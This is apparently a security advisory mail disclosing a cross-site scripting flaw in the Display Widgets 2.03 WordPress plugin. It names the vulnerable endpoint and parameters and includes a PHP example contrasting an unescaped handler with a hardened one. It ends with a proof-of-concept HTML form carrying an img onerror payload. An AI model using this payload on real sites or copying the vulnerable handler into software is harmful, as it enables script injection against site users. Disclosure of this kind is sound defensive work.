Subject: Cross-Site Scripting (XSS) in Display Widgets 2.03
Date: Tue, 11 Aug 2015 13:29:55 +0200

Hello,

Plugin: Display Widgets 2.03 https://wordpress.org/plugins/display-widgets/

1. Cross-Site Scripting (XSS) 

Any authenticated user, including an account with the low-privileged subscriber role, can inject HTML/JavaScript: the AJAX handler neither checks the caller's capabilities nor escapes the request parameters before echoing them into the HTML it returns.

Method: POST
Url: http://localhost/wp-admin/admin-ajax.php?action=dw_show_widget
Vulnerable parameters: id_base, widget_number, instance (must be valid JSON; the payload goes in the 'other_ids' key)

Example PHP callstack:
DWPlugin::show_widget_options   [/display-widgets/display-widgets.php:283]
DWPlugin::show_hide_widget_options   [/display-widgets/display-widgets.php:297]
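The pattern behind the call stack above, beside a hardened handler, as an added illustration that is not code from the Display Widgets plugin. Only the dw_show_widget action and the three parameter names come from the advisory; the function names, the nonce name, the exact markup echoed and the capability chosen are assumptions.

```php
<?php
/*
 * Added illustrative example, not code from the Display Widgets plugin.
 * The first handler shows the pattern the advisory describes (request
 * parameters echoed unescaped, no authorisation); the second is a hardened
 * version. Function names, nonce name and markup are assumptions.
 */

// VULNERABLE PATTERN (hypothetical): the POST parameters go straight into HTML.
function dw_show_widget_unsafe() {
    $id_base       = $_POST['id_base'];
    $widget_number = $_POST['widget_number'];
    $instance      = json_decode( stripslashes( $_POST['instance'] ), true );
    $other_ids     = isset( $instance['other_ids'] ) ? $instance['other_ids'] : array();

    // id_base = '"><img src=x onerror=alert(1) />' closes the attribute and injects a tag.
    echo '<input type="hidden" name="widget-id" value="' . $id_base . '-' . $widget_number . '" />';
    foreach ( (array) $other_ids as $other_id ) {
        echo '<input type="checkbox" name="dw_other_ids[]" value="' . $other_id . '" checked="checked" />';
    }
    wp_die();
}

// HARDENED: authorise, verify the nonce, constrain the input, escape on output.
function dw_show_widget_hardened() {
    // Widget management in core (widgets.php) requires this capability; subscribers lack it.
    if ( ! current_user_can( 'edit_theme_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }
    // Rejects requests forged from another origin (nonce action/field names are assumptions).
    check_ajax_referer( 'dw_show_widget', 'nonce' );

    // A widget id_base is a slug: keep only [a-z0-9_-].
    $id_base = sanitize_key( isset( $_POST['id_base'] ) ? wp_unslash( $_POST['id_base'] ) : '' );
    // The widget number is an integer index.
    $widget_number = absint( isset( $_POST['widget_number'] ) ? $_POST['widget_number'] : 0 );

    // Decode the JSON, insist on an array of strings, and reduce each id to a slug.
    $instance  = json_decode( isset( $_POST['instance'] ) ? wp_unslash( $_POST['instance'] ) : '', true );
    $other_ids = array();
    if ( is_array( $instance ) && isset( $instance['other_ids'] ) && is_array( $instance['other_ids'] ) ) {
        $other_ids = array_filter( array_map( 'sanitize_key', array_filter( $instance['other_ids'], 'is_string' ) ) );
    }

    if ( '' === $id_base ) {
        wp_send_json_error( 'bad id_base', 400 );
    }

    // Escape on output even though the values are already constrained: defence in depth.
    echo '<input type="hidden" name="widget-id" value="' . esc_attr( $id_base . '-' . $widget_number ) . '" />';
    foreach ( $other_ids as $other_id ) {
        echo '<input type="checkbox" name="dw_other_ids[]" value="' . esc_attr( $other_id ) . '" checked="checked" />';
    }
    wp_die();
}
add_action( 'wp_ajax_dw_show_widget', 'dw_show_widget_hardened' );
```

The client side that calls this handler would need to send the matching nonce, generated with wp_create_nonce( 'dw_show_widget' ) in the widget form. The capability check is what removes the subscriber-level attack surface; the escaping is what removes the XSS even for callers who are allowed to reach the handler.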

Verification:
--
<!-- Submit this from a browser that holds a logged-in session on the target site; a subscriber account is enough. -->
<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=dw_show_widget">
  <!-- The leading "> closes the attribute the value is echoed into; the img fires its handler when src=x fails to load. -->
  <input type="text" name="id_base" value='"><img src=x onerror=alert(1) />' />
  <input type="submit" />
</form>
--


--
Regards,
Marcin Probola,